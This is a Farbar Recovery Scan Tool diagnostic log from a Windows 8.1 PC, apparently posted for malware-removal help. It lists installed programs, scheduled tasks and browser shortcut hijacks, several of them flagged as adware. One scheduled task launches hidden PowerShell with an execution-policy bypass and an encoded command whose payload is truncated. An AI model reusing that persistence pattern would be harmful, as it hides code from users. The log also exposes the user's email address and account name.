2015-12-28 23:01 - 2015-12-28 23:02 - 0005761 _____ () C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.installation.log
2015-12-28 23:02 - 2015-12-28 23:02 - 0000078 _____ () C:\Users\hersheychoco9\AppData\Roaming\Selection Tools.installation.log
2015-12-28 23:01 - 2015-12-28 23:01 - 0000097 _____ () C:\Users\hersheychoco9\AppData\Roaming\WindApp.boostrap.log
2015-12-28 23:02 - 2015-12-28 23:02 - 0000078 _____ () C:\Users\hersheychoco9\AppData\Roaming\WindApp.installation.log
2015-12-28 22:57 - 2015-12-28 22:57 - 0009216 _____ () C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
2015-04-08 10:52 - 2015-04-08 10:52 - 0002493 _____ () C:\Users\hersheychoco9\AppData\Local\recently-used.xbel
2015-12-28 22:57 - 2015-12-28 22:57 - 0002560 _____ () C:\Users\hersheychoco9\AppData\Local\uninstall.exe
2014-05-13 21:05 - 2014-05-13 21:05 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2015-12-28 23:16 - 2015-12-28 23:16 - 0001520 _____ () C:\ProgramData\tempimage.bmp

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-12-20 22:31

==================== End of FRST.txt ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:31-12-2015
Ran by hersheychoco9 (2016-01-05 17:09:21)
Running from D:\Utilities
Windows 8.1 (X64) (2014-05-14 03:51:59)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1030869394-3123877279-975090705-500 - Administrator - Disabled) => C:\Users\Administrator
Guest (S-1-5-21-1030869394-3123877279-975090705-501 - Limited - Disabled)
hersheychoco9 (S-1-5-21-1030869394-3123877279-975090705-1001 - Administrator - Enabled) => C:\Users\hersheychoco9

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Roboscan (Enabled - Up to date) {9D201895-DDC4-8A80-AD2D-06BCC9382E61}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Roboscan (Enabled - Up to date) {2641F971-FBFE-850E-979D-3DCEB2BF64DC}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Roboscan (Enabled) {A51B99B0-97AB-8BD8-8672-AF8937EB691A}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.3.0.151 - Adobe Systems Incorporated)
Adobe Flash Professional CC 2015 (HKLM-x32\...\{31390329-FFF0-11E4-85AD-AF2C4143F080}) (Version: 15.0 - Adobe Systems Incorporated)
Adobe Photoshop Elements 11 (HKLM-x32\...\Adobe Photoshop Elements 11) (Version: 11.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)
Aliens versus Predator Classic 2000 (HKLM-x32\...\Steam App 3730) (Version: - Rebellion)
Autodesk SketchBookExpress 2010 R1 (HKLM-x32\...\{426187BC-F500-4208-B3C1-96876EE7FA31}) (Version: 4.12.0001 - Autodesk)
Awesomenauts (HKLM-x32\...\Steam App 204300) (Version: - Ronimo Games)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version: - Gearbox Software)
Castle Crashers (HKLM-x32\...\Steam App 204360) (Version: - The Behemoth)
Color Efex Pro 3.0 Wacom Edition 6 (HKLM-x32\...\Color Efex Pro 3.0 Wacom Edition 6 Stand-Alone) (Version: 3.1.1.1 - Nik Software, Inc.)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version: - Valve)
Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.7.5.63 - Dell Inc.)
Dell Digital Delivery (HKLM-x32\...\{D850CB7E-72BC-4510-BA4F-48932BFAB295}) (Version: 2.9.901.0 - Dell Products, LP)
Dell Product Registration (HKLM-x32\...\{764E68FE-C2F9-410E-90A8-CE7F8B9A36E2}) (Version: 2.03.0204 - Aviata Inc.)
Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.1.6664.93 - Dell)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 18.0.5.4 - Synaptics Incorporated)
Dell Update (HKLM-x32\...\{C87ADBDA-EF36-4A53-B05C-DBCD98D3A2CA}) (Version: 1.4.2000.0 - Dell Inc.)
Don't Starve Together Beta (HKLM-x32\...\Steam App 322330) (Version: - Klei Entertainment)
Dragon Nest (HKLM-x32\...\Steam App 11610) (Version: - Eyedentity Games Inc.)
Elements 11 Organizer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
ffdshow [rev 3154] [2009-12-09] (HKLM-x32\...\ffdshow_is1) (Version: 1.0 - )
Game Booster 3 (HKLM-x32\...\Game Booster_is1) (Version: 3.5 - IObit)
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version: - Facepunch Studios)
GIMP 2.8.14 (HKLM\...\GIMP-2_is1) (Version: 2.8.14 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Hammerwatch (HKLM-x32\...\Steam App 239070) (Version: - Crackshell)
Hero Siege (HKLM-x32\...\Steam App 269210) (Version: - Elias Viglione)
How to Survive (HKLM-x32\...\Steam App 250400) (Version: - )
Insurgency (HKLM-x32\...\Steam App 222880) (Version: - New World Interactive)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.22.1760 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3383 - Intel Corporation)
Intel(R) PROSet/Wireless Software for Bluetooth(R) Technology(patch version 3.0.1342.2) (HKLM\...\{302600C1-6BDF-4FD1-1311-148929CC1385}) (Version: 3.1.1311.0402 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.2.1000 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{6882ac6d-e97d-4e25-b3ea-5f3f21055dfe}) (Version: 16.6.0 - Intel Corporation)
IObit Uninstaller (HKLM-x32\...\IObitUninstall) (Version: 4.3.0.5 - IObit)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Killing Floor (HKLM-x32\...\Steam App 1250) (Version: - Tripwire Interactive)
Killing Floor 2 (HKLM-x32\...\Steam App 232090) (Version: - Tripwire Interactive)
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
League of Legends (x32 Version: 3.0.1 - Riot Games) Hidden
Life Is Strange™ (HKLM-x32\...\Steam App 319630) (Version: - DONTNOD Entertainment)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Motorola Mobile Drivers Installation 6.4.0 (HKLM\...\{27986EDD-C9EC-4B52-B92F-06D073F0AA52}) (Version: 6.4.0 - Motorola Mobility LLC)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
My Game Long Name (HKLM\...\UDK-cf0a7b04-8d44-4d89-bebf-60876b806bed) (Version: - Epic Games, Inc.)
Nicole (otome version) (HKLM-x32\...\Steam App 307190) (Version: - Winter Wolves)
NVIDIA PhysX (HKLM-x32\...\{B455E95A-B804-439F-B533-336B1635AE97}) (Version: 9.14.0702 - NVIDIA Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Outlast (HKLM-x32\...\Steam App 238320) (Version: - Red Barrels)
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version: - OVERKILL - a Starbreeze Studio.)
Pool Component (HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\{D8814471-E92F-6B47-10E9-0AD81C4D3361}) (Version: 1.6.5 - Beach Download corp) <==== ATTENTION
PSE11 STI Installer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 10.16.007 - Dell Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7152 - Realtek Semiconductor Corp.)
Risk of Rain (HKLM-x32\...\Steam App 248820) (Version: - )
Roboscan Internet Security (HKLM\...\Roboscan_is1) (Version: v2.5 - Roboscan Inc.)
Scribblenauts Unlimited (HKLM-x32\...\Steam App 218680) (Version: - 5th Cell Media)
SdRt4200 (HKLM-x32\...\{140347A0-4A0C-44FC-9CA1-C8A3471899B7}) (Version: 4.2.8.0 - パルティオソフト株式会社)
Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATTENTION
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.)
Star Wars Jedi Knight: Jedi Academy (HKLM-x32\...\Steam App 6020) (Version: - Raven Software)
Starbound (HKLM-x32\...\Steam App 211820) (Version: - )
State of Decay (HKLM-x32\...\Steam App 241540) (Version: - Undead Labs)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
The Witcher 2: Assassins of Kings Enhanced Edition (HKLM-x32\...\Steam App 20920) (Version: - CD PROJEKT RED)
TOXIKK (HKLM-x32\...\Steam App 324810) (Version: - Reakktor Studios)
Unturned (HKLM-x32\...\Steam App 304930) (Version: - Nelson Sexton)
Update for Japanese Microsoft IME Postal Code Dictionary (HKLM-x32\...\{15015752-9990-4516-A2B1-93823281FB8E}) (Version: 15.0.1759 - Microsoft Corporation)
Update for Japanese Microsoft IME Standard Dictionary (HKLM-x32\...\{E75B82FD-B6FD-4653-8685-F3A97BDFEA6E}) (Version: 15.0.2013 - Microsoft Corporation)
Update for Japanese Microsoft IME Standard Extended Dictionary (HKLM-x32\...\{01E87699-A49D-413A-B75B-7C434FEF979C}) (Version: 15.0.2013 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Vuze (HKLM\...\8461-7759-5462-8226) (Version: 5.5.0.0 - Azureus Software, Inc.)
Wacom (HKLM\...\Pen Tablet Driver) (Version: 5.3.5-3 - Wacom Technology Corp.)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
Wondershare MobileGo ( Version 8.0.0 ) (HKLM-x32\...\{1E04C795-7359-4E05-8A0E-5644F777AA09}_is1) (Version: 8.0.0 - Wondershare)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1030869394-3123877279-975090705-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
 
==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {12359E8D-4BF8-4EEF-8EF1-AF0A806E5D27} - System32\Tasks\Pool Component => Rundll32.exe "C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll",#1 <==== ATTENTION
Task: {1942C491-20D1-442F-BC74-6769F1D1280D} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {1D1D0A16-ADA3-40B5-A257-8E6A372FF7F1} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-hershey99999@gmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2015-09-04] (Adobe Systems Incorporated)
Task: {32CB8F3D-72E2-4F26-AF79-830A7A116864} - System32\Tasks\Easy Driver Pro Schedule => C:\Program Files (x86)\Probit Software\Easy Driver Pro\EDPTray.exe
Task: {3855C92B-1AB9-4877-B728-3E166A322521} - System32\Tasks\Genius_Interval => C:\Users\hersheychoco9\AppData\Roaming\Genius\Genius.exe [2015-12-10] ()
Task: {53C1C984-FAFA-45AF-A299-CC9D47FF50FC} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\Dell\SupportAssist\sessionchecker.exe [2015-10-29] (PC-Doctor, Inc.)
Task: {63B79E46-FBBD-4C8A-B7AA-45C6731402FF} - System32\Tasks\IBUpd2 => C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe [2015-12-22] ()
Task: {642B9DD6-2DA0-4C37-82B8-2B043D8E899E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {75F57505-E997-49EF-8280-CBEDA94B26CE} - System32\Tasks\Seventh => C:\Users\hersheychoco9\AppData\Roaming\Seventh\Seventh.exe <==== ATTENTION
Task: {7AF5A5D6-6314-46CE-A436-82522A94B518} - System32\Tasks\CCleanerSkipUAC => C:\Users\hersheychoco9\Desktop\Utilities\CCleaner\CCleaner.exe [2015-07-17] (Piriform Ltd)
Task: {7BC0E46C-BFEC-438E-AFA4-ECE363145385} - System32\Tasks\Game_Booster_AutoUpdate => C:\Program Files (x86)\IObit\Game Booster 3\AutoUpdate.exe [2015-11-07] ()
Task: {80113A5B-9EE2-4DF6-A1E6-7ED2A1C45754} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {80FA20B2-A979-4EAB-9EBA-6D46F57955A1} - System32\Tasks\Genius => C:\Users\hersheychoco9\AppData\Roaming\Genius\Genius.exe [2015-12-10] () <==== ATTENTION
Task: {82DB69B4-7124-4705-AFC2-219F5EBB3241} - System32\Tasks\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand [...]
Task: {86B9E75F-1889-49B5-B36A-35C70EC3D395} - System32\Tasks\Pool Component2 => Rundll32.exe "C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll",#1 <==== ATTENTION
Task: {9BA7BA7E-1533-4B35-ABFE-16D2D5009E73} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2014-01-16] (Synaptics Incorporated)
Task: {9CCB0C95-9CC9-4F2E-8D83-663775D82970} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
Task: {B1D873D1-5121-42A0-9C92-76FBCD27335F} - System32\Tasks\Sixth => C:\Users\hersheychoco9\AppData\Roaming\Sixth\Sixth.exe [2015-12-10] () <==== ATTENTION
Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {CBDF6C7E-6032-4090-8BEC-C5ACB6DAA611} - System32\Tasks\Ijufcyl => C:\PROGRA~1\SHOPPE~1\Osifch.bat
Task: {D07CC060-B787-4C15-B547-123801C27E3B} - System32\Tasks\Only-search Updater => C:\Windows\system32\wscript.exe [2014-10-28] (Microsoft Corporation) <==== ATTENTION
Task: {F61341FC-B312-4A23-8F26-9CB5191CF5BF} - System32\Tasks\SushiLeads => C:\Program Files (x86)\sushileads\ScheduledTask.exe
Task: {F911CADE-3A34-4F78-B0C3-0F67C227D535} - System32\Tasks\Dell\Dell Product Registration => /boot /LSRC=autolaunch
Task: {F93F7DEF-97E1-4486-951F-083F68C4E7B3} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\Dell\SupportAssist\uaclauncher.exe [2015-10-29] (PC-Doctor, Inc.)
Task: {FB55E3BB-58E9-4918-98BC-AE9BBBD84928} - System32\Tasks\ASC8_SkipUac_hersheychoco9 => D:\Utilities\Advanced SystemCare 8\ASC.exe [2015-06-16] (IObit)
Task: {FC206518-4BBD-4AAE-92C6-10454002C453} - System32\Tasks\Uninstaller_SkipUac_hersheychoco9 => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [2015-05-20] (IObit)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\ASC8_SkipUac_hersheychoco9.job => D:\Utilities\Advanced SystemCare 8\ASC.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Uninstaller_SkipUac_hersheychoco9.job => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCTztutbl10,686b5ee1-c35c-4e6b-9327-255ba3f61a27,
ShortcutWithArgument: C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCTztutbl10,686b5ee1-c35c-4e6b-9327-255ba3f61a27,
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCTztutbl10,686b5ee1-c35c-4e6b-9327-255ba3f61a27, --disable-quic
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCTztutbl10,686b5ee1-c35c-4e6b-9327-255ba3f61a27, --disable-quic

==================== Loaded Modules (Whitelisted) ==============

2015-12-28 23:08 - 2015-12-28 22:01 - 00768368 _____ () C:\Windows\system32\Comvud64.dll
2015-09-11 18:02 - 2015-09-11 18:02 - 00803488 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2015-04-16 16:55 - 2014-08-19 13:12 - 01356568 _____ () C:\Program Files\Tablet\Pen\libxml2.dll
2015-12-28 23:08 - 2015-12-22 12:03 - 00342016 _____ () C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe
2014-09-18 13:37 - 2014-07-02 21:55 - 00487144 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRCrawler.exe
2015-09-21 21:29 - 2014-10-16 09:26 - 00622880 _____ () C:\Program Files (x86)\IObit\LiveUpdate\ProductStatistics.dll
2015-12-28 23:04 - 2015-12-28 23:04 - 00028160 _____ () C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll
2015-12-28 23:04 - 2015-12-28 23:04 - 00012800 _____ () C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll
2015-12-28 23:04 - 2015-12-28 23:04 - 00011264 _____ () C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\{A2C49E11-7252-8301-FEB0-5D3FFF9EA4C3}.dat
2015-12-28 22:57 - 2015-12-28 22:57 - 00009216 _____ () C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
2015-09-21 21:29 - 2013-01-15 17:48 - 00348992 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madExcept_.bpl
2015-09-21 21:29 - 2013-01-15 17:48 - 00183616 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madBasic_.bpl
2015-09-21 21:29 - 2013-01-15 17:48 - 00051008 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madDisAsm_.bpl
2014-05-13 21:32 - 2013-12-18 11:53 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2014-09-18 13:37 - 2014-07-30 17:37 - 01906464 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\STRestoreAPI.dll
2014-05-13 21:40 - 2012-11-25 23:19 - 01153384 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\libxml2.dll
2014-09-18 13:37 - 2012-11-25 23:19 - 00117608 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\zlib1.dll
2015-12-16 21:07 - 2015-12-10 21:54 - 01583432 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libglesv2.dll
2015-12-16 21:07 - 2015-12-10 21:54 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Roboscan_UpdSrv => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Roboscan_UpdSrv => ""="Service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\008k.com -> 008k.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\00hq.com -> 00hq.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\0190-dialers.com -> 0190-dialers.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\01i.info -> 01i.info
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\05p.com -> 05p.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\0calories.net -> 0calories.net
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\0cj.net -> 0cj.net
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\0scan.com -> 0scan.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\1-domains-registrations.com -> 1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\1-se.com -> 1-se.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\1001movie.com -> 1001movie.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\1001night.biz -> 1001night.biz
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\100gal.net -> 100gal.net
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\100sexlinks.com -> 100sexlinks.com

There are 4788 more sites.


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 07:25 - 2015-12-29 14:05 - 00000831 ____A C:\Windows\system32\Drivers\etc\hosts

# ::1 localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

